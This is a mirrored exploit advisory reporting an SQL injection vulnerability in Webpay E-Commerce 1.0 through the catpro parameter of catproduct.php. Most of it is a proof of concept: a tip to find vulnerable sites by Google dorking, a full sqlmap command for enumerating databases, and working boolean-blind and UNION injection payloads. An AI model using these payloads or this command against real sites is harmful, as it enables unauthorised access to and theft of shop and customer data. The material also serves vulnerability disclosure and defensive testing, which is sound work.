Webpay E-Commerce 1.0 SQL Injection
2024-9-3 22:21:26 Author: packetstormsecurity.com(查看原文) 阅读量:7 收藏

=============================================================================================================================================
| # Title : Webpay E-Commerce v1.0 SQL Injection Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits) |
| # Vendor : http://webpay.com.np/ |
=============================================================================================================================================

poc :

[+] Dorking İn Google Or Other Search Enggine.

[+] use payload : catproduct.php?catpro=6

[+] E:\sqlmap>python sqlmap.py -u https://127.0.0.1/gajrajgraphicscomnp/home/catproduct.php?catpro=6 --risk=3 --level=5 --random-agent --user-agent -v3 --batch --threads=10 --dbs

[+] Parameter: catpro (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: catpro=6' AND 5853=5853-- KEle

Type: UNION query
Title: Generic UNION query (NULL) - 15 columns
Payload: catpro=6' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CONCAT(0x71627a6b71,0x646943714b4944576a41457943417a7652655a6579596c62475a63504a41756d7076426d65686e75,0x7171767071),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -

Greetings to :============================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |
==========================================================================


文章来源: https://packetstormsecurity.com/files/181277/webpayecomm10-sql.txt
如有侵权请联系:admin#unsafe.sh